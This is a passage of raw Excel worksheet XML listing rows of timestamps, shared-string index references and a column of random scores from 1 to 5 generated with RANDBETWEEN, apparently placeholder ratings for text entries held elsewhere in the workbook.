      <c r="C18016" t="s">
        <v>41</v>
      </c>
      <c r="E18016" t="s">
        <v>16163</v>
      </c>
      <c r="F18016">
        <f t="shared" ca="1" si="281"/>
        <v>4</v>
      </c>
    </row>
    <row r="18017" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18017" s="1">
        <v>43172.25445601852</v>
      </c>
      <c r="C18017" t="s">
        <v>41</v>
      </c>
      <c r="E18017" t="s">
        <v>16163</v>
      </c>
      <c r="F18017">
        <f t="shared" ca="1" si="281"/>
        <v>4</v>
      </c>
    </row>
    <row r="18018" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18018" s="1">
        <v>43172.253310185188</v>
      </c>
      <c r="C18018" t="s">
        <v>41</v>
      </c>
      <c r="E18018" t="s">
        <v>16163</v>
      </c>
      <c r="F18018">
        <f t="shared" ca="1" si="281"/>
        <v>2</v>
      </c>
    </row>
    <row r="18019" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18019" s="1">
        <v>43172.252893518518</v>
      </c>
      <c r="C18019" t="s">
        <v>41</v>
      </c>
      <c r="E18019" t="s">
        <v>16163</v>
      </c>
      <c r="F18019">
        <f t="shared" ca="1" si="281"/>
        <v>5</v>
      </c>
    </row>
    <row r="18020" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18020" s="1">
        <v>43172.252569444441</v>
      </c>
      <c r="C18020" t="s">
        <v>41</v>
      </c>
      <c r="E18020" t="s">
        <v>16163</v>
      </c>
      <c r="F18020">
        <f t="shared" ca="1" si="281"/>
        <v>4</v>
      </c>
    </row>
    <row r="18021" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18021" s="1">
        <v>43172.252303240741</v>
      </c>
      <c r="C18021" t="s">
        <v>41</v>
      </c>
      <c r="E18021" t="s">
        <v>16163</v>
      </c>
      <c r="F18021">
        <f t="shared" ca="1" si="281"/>
        <v>5</v>
      </c>
    </row>
    <row r="18022" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18022" s="1">
        <v>43172.251759259256</v>
      </c>
      <c r="C18022" t="s">
        <v>41</v>
      </c>
      <c r="E18022" t="s">
        <v>16163</v>
      </c>
      <c r="F18022">
        <f t="shared" ca="1" si="281"/>
        <v>5</v>
      </c>
    </row>
    <row r="18023" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18023" s="1">
        <v>43172.250208333331</v>
      </c>
      <c r="C18023" t="s">
        <v>41</v>
      </c>
      <c r="E18023" t="s">
        <v>16166</v>
      </c>
      <c r="F18023">
        <f t="shared" ca="1" si="281"/>
        <v>4</v>
      </c>
    </row>
    <row r="18024" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18024" s="1">
        <v>43172.249097222222</v>
      </c>
      <c r="C18024" t="s">
        <v>41</v>
      </c>
      <c r="F18024">
        <f t="shared" ca="1" si="281"/>
        <v>2</v>
      </c>
    </row>
    <row r="18025" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18025" s="1">
        <v>43172.236493055556</v>
      </c>
      <c r="C18025" t="s">
        <v>1064</v>
      </c>
      <c r="E18025" t="s">
        <v>16167</v>
      </c>
      <c r="F18025">
        <f t="shared" ca="1" si="281"/>
        <v>3</v>
      </c>
    </row>
    <row r="18026" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18026" s="1">
        <v>43172.200844907406</v>
      </c>
      <c r="C18026" t="s">
        <v>139</v>
      </c>
      <c r="E18026" t="s">
        <v>16168</v>
      </c>
      <c r="F18026">
        <f t="shared" ca="1" si="281"/>
        <v>5</v>
      </c>
    </row>
    <row r="18027" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18027" s="1">
        <v>43172.177569444444</v>
      </c>
      <c r="C18027" t="s">
        <v>118</v>
      </c>
      <c r="E18027" t="s">
        <v>16169</v>
      </c>
      <c r="F18027">
        <f t="shared" ca="1" si="281"/>
        <v>4</v>
      </c>
    </row>
    <row r="18028" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18028" s="1">
        <v>43172.160057870373</v>
      </c>
      <c r="C18028" t="s">
        <v>471</v>
      </c>
      <c r="D18028" t="s">
        <v>312</v>
      </c>
      <c r="E18028" s="2" t="s">
        <v>16170</v>
      </c>
      <c r="F18028">
        <f t="shared" ca="1" si="281"/>
        <v>5</v>
      </c>
    </row>
    <row r="18029" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18029" s="1">
        <v>43172.146053240744</v>
      </c>
      <c r="C18029" t="s">
        <v>197</v>
      </c>
      <c r="D18029" t="s">
        <v>817</v>
      </c>
      <c r="E18029" s="2" t="s">
        <v>16171</v>
      </c>
      <c r="F18029">
        <f t="shared" ca="1" si="281"/>
        <v>4</v>
      </c>
    </row>
    <row r="18030" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A18030" s="1">
        <v>43172.136134259257</v>
      </c>
      <c r="C18030" t="s">
        <v>41</v>
      </c>
      <c r="E18030" s="2" t="s">
        <v>16172</v>
      </c>
      <c r="F18030">
        <f t="shared" ca="1" si="281"/>
        <v>4</v>
      </c>
    </row>
    <row r="18031" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18031" s="1">
        <v>43172.101041666669</v>
      </c>
      <c r="C18031" t="s">
        <v>14</v>
      </c>
      <c r="E18031" t="s">
        <v>16173</v>
      </c>
      <c r="F18031">
        <f t="shared" ca="1" si="281"/>
        <v>5</v>
      </c>
    </row>
    <row r="18032" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18032" s="1">
        <v>43172.096400462964</v>
      </c>
      <c r="C18032" t="s">
        <v>69</v>
      </c>
      <c r="E18032" t="s">
        <v>16174</v>
      </c>
      <c r="F18032">
        <f t="shared" ca="1" si="281"/>
        <v>2</v>
      </c>
    </row>
    <row r="18033" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18033" s="1">
        <v>43172.05128472222</v>
      </c>
      <c r="C18033" t="s">
        <v>140</v>
      </c>
      <c r="D18033" t="s">
        <v>197</v>
      </c>
      <c r="E18033" t="s">
        <v>16175</v>
      </c>
      <c r="F18033">
        <f t="shared" ca="1" si="281"/>
        <v>3</v>
      </c>
    </row>
    <row r="18034" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A18034" s="1">
        <v>43172.04178240741</v>
      </c>
      <c r="C18034" t="s">
        <v>10</v>
      </c>
      <c r="D18034" t="s">
        <v>36</v>
      </c>
      <c r="E18034" s="2" t="s">
        <v>16176</v>
      </c>
      <c r="F18034">
        <f t="shared" ca="1" si="281"/>
        <v>3</v>
      </c>
    </row>
    <row r="18035" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18035" s="1">
        <v>43172.025138888886</v>
      </c>
      <c r="C18035" t="s">
        <v>166</v>
      </c>
      <c r="E18035" t="s">
        <v>16177</v>
      </c>
      <c r="F18035">
        <f t="shared" ca="1" si="281"/>
        <v>3</v>
      </c>
    </row>
    <row r="18036" spans="1:6" ht="345" x14ac:dyDescent="0.25">
      <c r="A18036" s="1">
        <v>43172.015625</v>
      </c>
      <c r="C18036" t="s">
        <v>10</v>
      </c>
      <c r="D18036" t="s">
        <v>36</v>
      </c>
      <c r="E18036" s="2" t="s">
        <v>16178</v>
      </c>
      <c r="F18036">
        <f t="shared" ca="1" si="281"/>
        <v>5</v>
      </c>
    </row>
    <row r="18037" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A18037" s="1">
        <v>43172.013506944444</v>
      </c>
      <c r="C18037" t="s">
        <v>319</v>
      </c>
      <c r="D18037" t="s">
        <v>11463</v>
      </c>
      <c r="E18037" s="2" t="s">
        <v>16179</v>
      </c>
      <c r="F18037">
        <f t="shared" ca="1" si="281"/>
        <v>2</v>
      </c>
    </row>
    <row r="18038" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A18038" s="1">
        <v>43172.005439814813</v>
      </c>
      <c r="C18038" t="s">
        <v>10</v>
      </c>
      <c r="D18038" t="s">
        <v>56</v>
      </c>
      <c r="E18038" s="2" t="s">
        <v>16180</v>
      </c>
      <c r="F18038">
        <f t="shared" ca="1" si="281"/>
        <v>5</v>
      </c>
    </row>
    <row r="18039" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A18039" s="1">
        <v>43171.955891203703</v>
      </c>
      <c r="C18039" t="s">
        <v>318</v>
      </c>
      <c r="E18039" s="2" t="s">
        <v>16181</v>
      </c>
      <c r="F18039">
        <f t="shared" ca="1" si="281"/>
        <v>4</v>
      </c>
    </row>
    <row r="18040" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18040" s="1">
        <v>43171.952175925922</v>
      </c>
      <c r="C18040" t="s">
        <v>319</v>
      </c>
      <c r="D18040" t="s">
        <v>320</v>
      </c>
      <c r="E18040" s="2" t="s">
        <v>16182</v>
      </c>
      <c r="F18040">
        <f t="shared" ca="1" si="281"/>
        <v>4</v>
      </c>
    </row>
    <row r="18041" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18041" s="1">
        <v>43171.941631944443</v>
      </c>
      <c r="C18041" t="s">
        <v>454</v>
      </c>
      <c r="F18041">
        <f t="shared" ca="1" si="281"/>
        <v>5</v>
      </c>
    </row>
    <row r="18042" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18042" s="1">
        <v>43171.769108796296</v>
      </c>
      <c r="C18042" t="s">
        <v>197</v>
      </c>
      <c r="D18042" t="s">
        <v>124</v>
      </c>
      <c r="E18042" s="2" t="s">
        <v>16183</v>
      </c>
      <c r="F18042">
        <f t="shared" ca="1" si="281"/>
        <v>1</v>
      </c>
    </row>
    <row r="18043" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18043" s="1">
        <v>43171.759328703702</v>
      </c>
      <c r="C18043" t="s">
        <v>197</v>
      </c>
      <c r="D18043" t="s">
        <v>2139</v>
      </c>
      <c r="E18043" s="2" t="s">
        <v>16184</v>
      </c>
      <c r="F18043">
        <f t="shared" ca="1" si="281"/>
        <v>2</v>
      </c>
    </row>
    <row r="18044" spans="1:6" ht="360" x14ac:dyDescent="0.25">
      <c r="A18044" s="1">
        <v>43171.752280092594</v>
      </c>
      <c r="C18044" t="s">
        <v>140</v>
      </c>
      <c r="D18044" t="s">
        <v>234</v>
      </c>
      <c r="E18044" s="2" t="s">
        <v>16185</v>
      </c>
      <c r="F18044">
        <f t="shared" ca="1" si="281"/>
        <v>3</v>
      </c>
    </row>
    <row r="18045" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A18045" s="1">
        <v>43171.725081018521</v>
      </c>
      <c r="C18045" t="s">
        <v>71</v>
      </c>
      <c r="E18045" s="2" t="s">
        <v>16186</v>
      </c>
      <c r="F18045">
        <f t="shared" ca="1" si="281"/>
        <v>5</v>
      </c>
    </row>
    <row r="18046" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A18046" s="1">
        <v>43171.704710648148</v>
      </c>
      <c r="C18046" t="s">
        <v>48</v>
      </c>
      <c r="E18046" s="2" t="s">
        <v>16187</v>
      </c>
      <c r="F18046">
        <f t="shared" ca="1" si="281"/>
        <v>1</v>
      </c>
    </row>
    <row r="18047" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A18047" s="1">
        <v>43171.67765046296</v>
      </c>
      <c r="C18047" t="s">
        <v>260</v>
      </c>
      <c r="E18047" s="2" t="s">
        <v>16188</v>
      </c>
      <c r="F18047">
        <f t="shared" ca="1" si="281"/>
        <v>4</v>
      </c>
    </row>
    <row r="18048" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18048" s="1">
        <v>43171.67701388889</v>
      </c>
      <c r="C18048" t="s">
        <v>10</v>
      </c>
      <c r="D18048" t="s">
        <v>374</v>
      </c>
      <c r="E18048" t="s">
        <v>16189</v>
      </c>
      <c r="F18048">
        <f t="shared" ca="1" si="281"/>
        <v>5</v>
      </c>
    </row>
    <row r="18049" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A18049" s="1">
        <v>43171.658495370371</v>
      </c>
      <c r="C18049" t="s">
        <v>16</v>
      </c>
      <c r="E18049" s="2" t="s">
        <v>16190</v>
      </c>
      <c r="F18049">
        <f t="shared" ca="1" si="281"/>
        <v>1</v>
      </c>
    </row>
    <row r="18050" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18050" s="1">
        <v>43171.651446759257</v>
      </c>
      <c r="C18050" t="s">
        <v>686</v>
      </c>
      <c r="D18050" t="s">
        <v>25</v>
      </c>
      <c r="E18050" t="s">
        <v>16191</v>
      </c>
      <c r="F18050">
        <f t="shared" ref="F18050:F18113" ca="1" si="282">RANDBETWEEN(1,5)</f>
        <v>1</v>
      </c>
    </row>
    <row r="18051" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18051" s="1">
        <v>43171.64980324074</v>
      </c>
      <c r="C18051" t="s">
        <v>6</v>
      </c>
      <c r="D18051" t="s">
        <v>1993</v>
      </c>
      <c r="F18051">
        <f t="shared" ca="1" si="282"/>
        <v>4</v>
      </c>
    </row>
    <row r="18052" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18052" s="1">
        <v>43171.643877314818</v>
      </c>
      <c r="C18052" t="s">
        <v>6</v>
      </c>
      <c r="D18052" t="s">
        <v>114</v>
      </c>
      <c r="E18052" t="s">
        <v>16192</v>
      </c>
      <c r="F18052">
        <f t="shared" ca="1" si="282"/>
        <v>1</v>
      </c>
    </row>
    <row r="18053" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A18053" s="1">
        <v>43171.628275462965</v>
      </c>
      <c r="C18053" t="s">
        <v>41</v>
      </c>
      <c r="E18053" s="2" t="s">
        <v>16193</v>
      </c>
      <c r="F18053">
        <f t="shared" ca="1" si="282"/>
        <v>3</v>
      </c>
    </row>
    <row r="18054" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18054" s="1">
        <v>43171.621736111112</v>
      </c>
      <c r="C18054" t="s">
        <v>10</v>
      </c>
      <c r="D18054" t="s">
        <v>80</v>
      </c>
      <c r="E18054" t="s">
        <v>16194</v>
      </c>
      <c r="F18054">
        <f t="shared" ca="1" si="282"/>
        <v>5</v>
      </c>
    </row>
    <row r="18055" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18055" s="1">
        <v>43171.575659722221</v>
      </c>
      <c r="C18055" t="s">
        <v>10</v>
      </c>
      <c r="D18055" t="s">
        <v>89</v>
      </c>
      <c r="E18055" t="s">
        <v>16195</v>
      </c>
      <c r="F18055">
        <f t="shared" ca="1" si="282"/>
        <v>5</v>
      </c>
    </row>
    <row r="18056" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18056" s="1">
        <v>43171.571192129632</v>
      </c>
      <c r="C18056" t="s">
        <v>10</v>
      </c>
      <c r="D18056" t="s">
        <v>107</v>
      </c>
      <c r="E18056" s="2" t="s">
        <v>16196</v>
      </c>
      <c r="F18056">
        <f t="shared" ca="1" si="282"/>
        <v>3</v>
      </c>
    </row>
    <row r="18057" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18057" s="1">
        <v>43171.570138888892</v>
      </c>
      <c r="C18057" t="s">
        <v>65</v>
      </c>
      <c r="D18057" t="s">
        <v>192</v>
      </c>
      <c r="E18057" t="s">
        <v>16197</v>
      </c>
      <c r="F18057">
        <f t="shared" ca="1" si="282"/>
        <v>5</v>
      </c>
    </row>
    <row r="18058" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A18058" s="1">
        <v>43171.56590277778</v>
      </c>
      <c r="C18058" t="s">
        <v>5087</v>
      </c>
      <c r="D18058" t="s">
        <v>494</v>
      </c>
      <c r="E18058" s="2" t="s">
        <v>16198</v>
      </c>
      <c r="F18058">
        <f t="shared" ca="1" si="282"/>
        <v>3</v>
      </c>
    </row>
    <row r="18059" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18059" s="1">
        <v>43171.56490740741</v>
      </c>
      <c r="C18059" t="s">
        <v>1199</v>
      </c>
      <c r="D18059" t="s">
        <v>163</v>
      </c>
      <c r="E18059" s="2" t="s">
        <v>16199</v>
      </c>
      <c r="F18059">
        <f t="shared" ca="1" si="282"/>
        <v>1</v>
      </c>
    </row>
    <row r="18060" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A18060" s="1">
        <v>43171.563090277778</v>
      </c>
      <c r="C18060" t="s">
        <v>6</v>
      </c>
      <c r="D18060" t="s">
        <v>25</v>
      </c>
      <c r="E18060" s="2" t="s">
        <v>16200</v>
      </c>
      <c r="F18060">
        <f t="shared" ca="1" si="282"/>
        <v>3</v>
      </c>
    </row>
    <row r="18061" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18061" s="1">
        <v>43171.552789351852</v>
      </c>
      <c r="C18061" t="s">
        <v>10</v>
      </c>
      <c r="D18061" t="s">
        <v>251</v>
      </c>
      <c r="E18061" t="s">
        <v>16201</v>
      </c>
      <c r="F18061">
        <f t="shared" ca="1" si="282"/>
        <v>1</v>
      </c>
    </row>
    <row r="18062" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A18062" s="1">
        <v>43171.518900462965</v>
      </c>
      <c r="C18062" t="s">
        <v>41</v>
      </c>
      <c r="E18062" s="2" t="s">
        <v>16202</v>
      </c>
      <c r="F18062">
        <f t="shared" ca="1" si="282"/>
        <v>3</v>
      </c>
    </row>
    <row r="18063" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18063" s="1">
        <v>43171.500428240739</v>
      </c>
      <c r="C18063" t="s">
        <v>10</v>
      </c>
      <c r="D18063" t="s">
        <v>52</v>
      </c>
      <c r="E18063" t="s">
        <v>16203</v>
      </c>
      <c r="F18063">
        <f t="shared" ca="1" si="282"/>
        <v>1</v>
      </c>
    </row>
    <row r="18064" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18064" s="1">
        <v>43171.482129629629</v>
      </c>
      <c r="C18064" t="s">
        <v>173</v>
      </c>
      <c r="E18064" t="s">
        <v>16204</v>
      </c>
      <c r="F18064">
        <f t="shared" ca="1" si="282"/>
        <v>5</v>
      </c>
    </row>
    <row r="18065" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A18065" s="1">
        <v>43171.471817129626</v>
      </c>
      <c r="C18065" t="s">
        <v>10</v>
      </c>
      <c r="D18065" t="s">
        <v>20</v>
      </c>
      <c r="E18065" s="2" t="s">
        <v>16205</v>
      </c>
      <c r="F18065">
        <f t="shared" ca="1" si="282"/>
        <v>1</v>
      </c>
    </row>
    <row r="18066" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A18066" s="1">
        <v>43171.470648148148</v>
      </c>
      <c r="C18066" t="s">
        <v>344</v>
      </c>
      <c r="E18066" s="2" t="s">
        <v>16206</v>
      </c>
      <c r="F18066">
        <f t="shared" ca="1" si="282"/>
        <v>4</v>
      </c>
    </row>
    <row r="18067" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18067" s="1">
        <v>43171.458090277774</v>
      </c>
      <c r="C18067" t="s">
        <v>6</v>
      </c>
      <c r="D18067" t="s">
        <v>25</v>
      </c>
      <c r="E18067" t="s">
        <v>16207</v>
      </c>
      <c r="F18067">
        <f t="shared" ca="1" si="282"/>
        <v>4</v>
      </c>
    </row>
    <row r="18068" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A18068" s="1">
        <v>43171.434791666667</v>
      </c>
      <c r="C18068" t="s">
        <v>48</v>
      </c>
      <c r="E18068" s="2" t="s">
        <v>16208</v>
      </c>
      <c r="F18068">
        <f t="shared" ca="1" si="282"/>
        <v>4</v>
      </c>
    </row>
    <row r="18069" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18069" s="1">
        <v>43171.4218287037</v>
      </c>
      <c r="C18069" t="s">
        <v>10</v>
      </c>
      <c r="D18069" t="s">
        <v>271</v>
      </c>
      <c r="E18069" t="s">
        <v>16209</v>
      </c>
      <c r="F18069">
        <f t="shared" ca="1" si="282"/>
        <v>2</v>
      </c>
    </row>
    <row r="18070" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A18070" s="1">
        <v>43171.407187500001</v>
      </c>
      <c r="C18070" t="s">
        <v>10</v>
      </c>
      <c r="D18070" t="s">
        <v>36</v>
      </c>
      <c r="E18070" s="2" t="s">
        <v>16210</v>
      </c>
      <c r="F18070">
        <f t="shared" ca="1" si="282"/>
        <v>3</v>
      </c>
    </row>
    <row r="18071" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18071" s="1">
        <v>43171.38925925926</v>
      </c>
      <c r="C18071" t="s">
        <v>71</v>
      </c>
      <c r="E18071" t="s">
        <v>16211</v>
      </c>
      <c r="F18071">
        <f t="shared" ca="1" si="282"/>
        <v>2</v>
      </c>
    </row>
    <row r="18072" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A18072" s="1">
        <v>43171.388009259259</v>
      </c>
      <c r="C18072" t="s">
        <v>535</v>
      </c>
      <c r="E18072" s="2" t="s">
        <v>16212</v>
      </c>
      <c r="F18072">
        <f t="shared" ca="1" si="282"/>
        <v>3</v>
      </c>
    </row>
    <row r="18073" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18073" s="1">
        <v>43171.376284722224</v>
      </c>
      <c r="C18073" t="s">
        <v>10</v>
      </c>
      <c r="D18073" t="s">
        <v>290</v>
      </c>
      <c r="E18073" t="s">
        <v>16213</v>
      </c>
      <c r="F18073">
        <f t="shared" ca="1" si="282"/>
        <v>5</v>
      </c>
    </row>
    <row r="18074" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18074" s="1">
        <v>43171.363634259258</v>
      </c>
      <c r="C18074" t="s">
        <v>16</v>
      </c>
      <c r="E18074" t="s">
        <v>16214</v>
      </c>
      <c r="F18074">
        <f t="shared" ca="1" si="282"/>
        <v>4</v>
      </c>
    </row>
    <row r="18075" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A18075" s="1">
        <v>43171.359664351854</v>
      </c>
      <c r="C18075" t="s">
        <v>776</v>
      </c>
      <c r="E18075" s="2" t="s">
        <v>16215</v>
      </c>
      <c r="F18075">
        <f t="shared" ca="1" si="282"/>
        <v>5</v>
      </c>
    </row>
    <row r="18076" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18076" s="1">
        <v>43171.358078703706</v>
      </c>
      <c r="C18076" t="s">
        <v>454</v>
      </c>
      <c r="E18076" t="s">
        <v>16216</v>
      </c>
      <c r="F18076">
        <f t="shared" ca="1" si="282"/>
        <v>2</v>
      </c>
    </row>
    <row r="18077" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18077" s="1">
        <v>43171.354224537034</v>
      </c>
      <c r="C18077" t="s">
        <v>124</v>
      </c>
      <c r="D18077" t="s">
        <v>312</v>
      </c>
      <c r="E18077" t="s">
        <v>16217</v>
      </c>
      <c r="F18077">
        <f t="shared" ca="1" si="282"/>
        <v>5</v>
      </c>
    </row>
    <row r="18078" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A18078" s="1">
        <v>43171.307870370372</v>
      </c>
      <c r="C18078" t="s">
        <v>71</v>
      </c>
      <c r="E18078" s="2" t="s">
        <v>16218</v>
      </c>
      <c r="F18078">
        <f t="shared" ca="1" si="282"/>
        <v>1</v>
      </c>
    </row>
    <row r="18079" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18079" s="1">
        <v>43171.286805555559</v>
      </c>
      <c r="C18079" t="s">
        <v>41</v>
      </c>
      <c r="E18079" t="s">
        <v>16219</v>
      </c>
      <c r="F18079">
        <f t="shared" ca="1" si="282"/>
        <v>2</v>
      </c>
    </row>
    <row r="18080" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A18080" s="1">
        <v>43171.244699074072</v>
      </c>
      <c r="C18080" t="s">
        <v>178</v>
      </c>
      <c r="E18080" s="2" t="s">
        <v>16220</v>
      </c>
      <c r="F18080">
        <f t="shared" ca="1" si="282"/>
        <v>1</v>
      </c>
    </row>
    <row r="18081" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18081" s="1">
        <v>43171.24422453704</v>
      </c>
      <c r="C18081" t="s">
        <v>430</v>
      </c>
      <c r="E18081" t="s">
        <v>16221</v>
      </c>
      <c r="F18081">
        <f t="shared" ca="1" si="282"/>
        <v>2</v>
      </c>
    </row>
    <row r="18082" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18082" s="1">
        <v>43171.236585648148</v>
      </c>
      <c r="C18082" t="s">
        <v>48</v>
      </c>
      <c r="E18082" t="s">
        <v>16222</v>
      </c>
      <c r="F18082">
        <f t="shared" ca="1" si="282"/>
        <v>4</v>
      </c>
    </row>
    <row r="18083" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18083" s="1">
        <v>43171.180763888886</v>
      </c>
      <c r="C18083" t="s">
        <v>3994</v>
      </c>
      <c r="D18083" t="s">
        <v>290</v>
      </c>
      <c r="E18083" s="2" t="s">
        <v>16223</v>
      </c>
      <c r="F18083">
        <f t="shared" ca="1" si="282"/>
        <v>4</v>
      </c>
    </row>
    <row r="18084" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18084" s="1">
        <v>43171.169560185182</v>
      </c>
      <c r="C18084" t="s">
        <v>65</v>
      </c>
      <c r="D18084" t="s">
        <v>11</v>
      </c>
      <c r="E18084" t="s">
        <v>16197</v>
      </c>
      <c r="F18084">
        <f t="shared" ca="1" si="282"/>
        <v>3</v>
      </c>
    </row>
    <row r="18085" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18085" s="1">
        <v>43171.146585648145</v>
      </c>
      <c r="C18085" t="s">
        <v>197</v>
      </c>
      <c r="D18085" t="s">
        <v>817</v>
      </c>
      <c r="E18085" s="2" t="s">
        <v>16224</v>
      </c>
      <c r="F18085">
        <f t="shared" ca="1" si="282"/>
        <v>3</v>
      </c>
    </row>
    <row r="18086" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A18086" s="1">
        <v>43171.115069444444</v>
      </c>
      <c r="C18086" t="s">
        <v>724</v>
      </c>
      <c r="E18086" s="2" t="s">
        <v>16225</v>
      </c>
      <c r="F18086">
        <f t="shared" ca="1" si="282"/>
        <v>3</v>
      </c>
    </row>
    <row r="18087" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A18087" s="1">
        <v>43171.108807870369</v>
      </c>
      <c r="C18087" t="s">
        <v>318</v>
      </c>
      <c r="E18087" s="2" t="s">
        <v>16226</v>
      </c>
      <c r="F18087">
        <f t="shared" ca="1" si="282"/>
        <v>1</v>
      </c>
    </row>
    <row r="18088" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18088" s="1">
        <v>43171.089016203703</v>
      </c>
      <c r="C18088" t="s">
        <v>197</v>
      </c>
      <c r="D18088" t="s">
        <v>25</v>
      </c>
      <c r="E18088" s="2" t="s">
        <v>16227</v>
      </c>
      <c r="F18088">
        <f t="shared" ca="1" si="282"/>
        <v>1</v>
      </c>
    </row>
    <row r="18089" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18089" s="1">
        <v>43171.080567129633</v>
      </c>
      <c r="C18089" t="s">
        <v>197</v>
      </c>
      <c r="D18089" t="s">
        <v>290</v>
      </c>
      <c r="E18089" s="2" t="s">
        <v>16228</v>
      </c>
      <c r="F18089">
        <f t="shared" ca="1" si="282"/>
        <v>2</v>
      </c>
    </row>
    <row r="18090" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A18090" s="1">
        <v>43171.042164351849</v>
      </c>
      <c r="C18090" t="s">
        <v>477</v>
      </c>
      <c r="E18090" s="2" t="s">
        <v>16229</v>
      </c>
      <c r="F18090">
        <f t="shared" ca="1" si="282"/>
        <v>1</v>
      </c>
    </row>
    <row r="18091" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A18091" s="1">
        <v>43171.030891203707</v>
      </c>
      <c r="C18091" t="s">
        <v>253</v>
      </c>
      <c r="E18091" s="2" t="s">
        <v>16230</v>
      </c>
      <c r="F18091">
        <f t="shared" ca="1" si="282"/>
        <v>2</v>
      </c>
    </row>
    <row r="18092" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18092" s="1">
        <v>43170.966967592591</v>
      </c>
      <c r="C18092" t="s">
        <v>65</v>
      </c>
      <c r="D18092" t="s">
        <v>33</v>
      </c>
      <c r="E18092" t="s">
        <v>16197</v>
      </c>
      <c r="F18092">
        <f t="shared" ca="1" si="282"/>
        <v>5</v>
      </c>
    </row>
    <row r="18093" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18093" s="1">
        <v>43170.964999999997</v>
      </c>
      <c r="C18093" t="s">
        <v>163</v>
      </c>
      <c r="D18093" t="s">
        <v>33</v>
      </c>
      <c r="E18093" s="2" t="s">
        <v>16231</v>
      </c>
      <c r="F18093">
        <f t="shared" ca="1" si="282"/>
        <v>1</v>
      </c>
    </row>
    <row r="18094" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18094" s="1">
        <v>43170.95815972222</v>
      </c>
      <c r="C18094" t="s">
        <v>163</v>
      </c>
      <c r="D18094" t="s">
        <v>1993</v>
      </c>
      <c r="E18094" s="2" t="s">
        <v>16232</v>
      </c>
      <c r="F18094">
        <f t="shared" ca="1" si="282"/>
        <v>1</v>
      </c>
    </row>
    <row r="18095" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18095" s="1">
        <v>43170.954328703701</v>
      </c>
      <c r="C18095" t="s">
        <v>140</v>
      </c>
      <c r="D18095" t="s">
        <v>847</v>
      </c>
      <c r="E18095" s="2" t="s">
        <v>16233</v>
      </c>
      <c r="F18095">
